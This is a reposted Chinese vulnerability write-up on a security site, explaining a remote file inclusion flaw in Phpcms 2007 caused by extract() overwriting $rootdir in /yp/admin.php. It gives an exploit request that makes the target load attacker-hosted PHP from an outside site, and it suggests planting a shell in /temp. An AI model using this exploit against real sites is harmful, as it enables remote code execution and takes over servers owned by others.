首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 专题文章

Phpcms 2007 远程文件包含漏洞


http://www.gipsky.com/
PS:@extract函数。



Phpcms 2007 远程文件包含漏洞



Flyh4t [w.s.t]



www.wolvez.org

该cms的核心配置文件/include/common.inc.php有缺陷

--------------------------------------------

//23行开始

@extract($_POST, EXTR_OVERWRITE);

@extract($_GET, EXTR_OVERWRITE);

unset($_POST, $_GET);

------------------------------------------------

这里extract函数会导致变量覆盖,可能引发一系列的问题



我们看/yp/admin.php,这个文件名字是挺吓人的,还带admin。但是注册个企业用户就可以访问该页面了,我们看部分代码

------------------------------------------------

//从头开始看

$rootdir = str_replace("\\", '/', dirname(__FILE__));

require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值

require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';

if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);

require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含

------------------------------------------------



利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件,当然common.inc.php就是你的恶意代码,然后注册个用户访问网站并提交

http://target.com/yp/admin.php? Rootdir=http://site.com/即可。



最后多说一句,php5默认不开启远程文件功能,假如想包含本地文件又要被gpc限制,所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的方法,可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之



from:http://www.wolvez.org/forum/redirect.php?tid=182&goto=lastpost







[最后修改由 , 于 2008-08-19 15:53:16]
<< sql通用防注入3.2 beta 20080820更新 一条匹配SQL语句的正则 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号